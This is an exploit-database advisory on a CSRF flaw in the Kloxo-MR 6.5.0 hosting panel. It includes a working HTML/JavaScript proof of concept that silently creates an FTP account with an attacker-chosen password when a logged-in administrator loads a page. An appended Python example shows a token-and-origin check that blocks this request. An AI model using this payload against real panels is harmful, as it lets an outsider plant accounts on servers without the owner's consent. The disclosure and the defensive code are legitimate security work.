0day.today - Biggest Exploit Database in the World.
Kloxo-MR 6.5.0 - CSRF Vulnerability
# Exploit Title : Kloxo-MR 6.5.0 CSRF Vulnerability
# Vendor Homepage : https://github.com/mustafaramadhan/kloxo/tree/dev
# Version : Kloxo-MR 6.5.0.f-2014020301
# Tested on : CentOS 6.4
# Exploit Author : Necmettin COSKUN => @babayarisi
# Blog : http://www.ncoskun.com http://www.grisapka.org
# Discovery date : 03/12/2014
# CVE : N/A

Kloxo-MR is a special edition (fork) of Kloxo with many features not present in the official Kloxo release (6.1.12+). The fork is named Kloxo-MR, meaning "Kloxo fork by Mustafa Ramadhan".

================
CSRF Vulnerability
================

Like stable Kloxo, Kloxo-MR has many POST- and GET-based forms. Some inputs are escaped for special characters, but the forms carry no CSRF protection (no secret / anti-CSRF token), and state-changing actions are accepted over GET. A remote attacker who gets an authenticated panel user to load a page they control can therefore submit these forms on the victim's behalf to add/delete MySQL users, create/delete subdomains, or add/delete FTP accounts.

The PoC below fires the request from an <img> tag, so the victim only has to load the attacker's page; the request goes to the panel's HTTP port 7778 (change the scheme to https if the panel only listens over TLS).

PoC Exploit
================
<html>
<head><title>Kloxo-MR demo</title></head>
<script type="text/javascript">
function yurudi(){
///////////////////////////////////////////////////////////
//Kloxo-MR 6.5.0 CSRF Vulnerability                      //
//Author:Necmettin COSKUN => twitter.com/@babayarisi     //
//Blog: http://www.ncoskun.com | http://www.grisapka.org //
///////////////////////////////////////////////////////////
//Remote host
var host="victim.com";
//New FTP username
var username="demouser";
//New FTP password
var pass="12345678";
//This creates a new folder under the admin dir: /admin/yourfolder
var dir="demodirectory";
//If necessary only modify http to https ;)
var urlson="http://"+host+":7778//display.php?frm_o_cname=ftpuser&frm_dttype&frm_ftpuser_c_nname="+username+"&frm_ftpuser_c_complete_name_f=--direct--&frm_ftpuser_c_password="+pass+"&frm_confirm_password="+pass+"&frm_ftpuser_c_directory="+dir+"&frm_ftpuser_c_ftp_disk_usage&frm_action=add";
document.getElementById('demoexploit').src=urlson;
}
</script>
<body onload="yurudi();">
<img id="demoexploit" src="" alt="">
</body>
</html>

Discovered by:
================
Necmettin COSKUN | GrisapkaGuvenlikGrubu | 4ewa2getha!

# 0day.today [2024-12-25] #
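The defence the advisory says is missing, as an added example that is not part of the original advisory or of the Kloxo-MR code base: a request checker that rejects the exact request the PoC's <img> tag builds and accepts only a same-origin POST carrying a per-session synchronizer token. The handler, the `csrf_token` field name and the session layout are hypothetical; the query string is reconstructed from the PoC above with its default values filled in.

```python
"""Synchronizer-token CSRF check for a Kloxo-style display.php handler.

Added example, not Kloxo-MR code. Three layered checks, each of which alone
already defeats the PoC on this page:
  1. state-changing frm_action values are refused over GET;
  2. Origin/Referer must name the panel's own host;
  3. the form body must carry the session's secret token.
"""
import hmac
import secrets
from urllib.parse import parse_qs, urlsplit

STATE_CHANGING_ACTIONS = {"add", "delete", "update"}
TOKEN_FIELD = "csrf_token"  # hypothetical hidden-field name

# Constructed sample: the URL the PoC's yurudi() builds with its default values.
POC_URL = (
    "http://victim.com:7778//display.php?frm_o_cname=ftpuser&frm_dttype"
    "&frm_ftpuser_c_nname=demouser&frm_ftpuser_c_complete_name_f=--direct--"
    "&frm_ftpuser_c_password=12345678&frm_confirm_password=12345678"
    "&frm_ftpuser_c_directory=demodirectory&frm_ftpuser_c_ftp_disk_usage"
    "&frm_action=add"
)


def new_session() -> dict:
    """Server-side session record; the token is minted once per login."""
    return {"csrf_token": secrets.token_hex(32)}


def csrf_hidden_field(session: dict) -> str:
    """Markup the legitimate form embeds. A cross-origin attacker page
    cannot read it, so it cannot forge a request that carries it."""
    return (f'<input type="hidden" name="{TOKEN_FIELD}" '
            f'value="{session["csrf_token"]}">')


def _flatten(params: dict) -> dict:
    """parse_qs yields lists; keep the first value of each field."""
    return {k: v[0] for k, v in params.items()}


def check_request(session: dict, method: str, url: str, body: str,
                  headers: dict, site_host: str) -> tuple:
    """Return (allowed, reason) for one request against display.php.

    site_host is the panel's own host:port as it appears in a URL netloc,
    e.g. "victim.com:7778". Read-only requests pass untouched.
    """
    query = _flatten(parse_qs(urlsplit(url).query, keep_blank_values=True))
    form = _flatten(parse_qs(body or "", keep_blank_values=True))
    action = form.get("frm_action") or query.get("frm_action")
    if action not in STATE_CHANGING_ACTIONS:
        return True, "read-only request"

    # 1. A state change must not be triggerable by a bare <img>/<a> GET.
    if method != "POST":
        return False, f"{action} via {method} refused; state changes require POST"

    # 2. Strict origin check: absent or foreign Origin/Referer is refused.
    source = headers.get("Origin") or headers.get("Referer")
    if not source or urlsplit(source).netloc != site_host:
        return False, "cross-site origin"

    # 3. Synchronizer token, compared in constant time (bytes, so a
    #    non-ASCII attacker value cannot make compare_digest raise).
    token = form.get(TOKEN_FIELD, "")
    if not hmac.compare_digest(token.encode(), session["csrf_token"].encode()):
        return False, "missing or wrong CSRF token"
    return True, "ok"


if __name__ == "__main__":
    s = new_session()
    print(check_request(s, "GET", POC_URL, "", {}, "victim.com:7778"))
    legit = urlsplit(POC_URL).query + f"&{TOKEN_FIELD}=" + s["csrf_token"]
    print(check_request(s, "POST", "http://victim.com:7778/display.php",
                        legit, {"Origin": "http://victim.com:7778"},
                        "victim.com:7778"))
```

The order matters for the failure modes: the PoC is stopped by check 1 before any header or token is examined; an attacker who upgrades to an auto-submitted POST form is stopped by check 2; and a same-origin request that still lacks the token (for example one injected through a script flaw on the panel itself) is stopped by check 3. Check 2 alone is not sufficient, since some clients strip Referer and older browsers omit Origin, which is why the token remains the authoritative control.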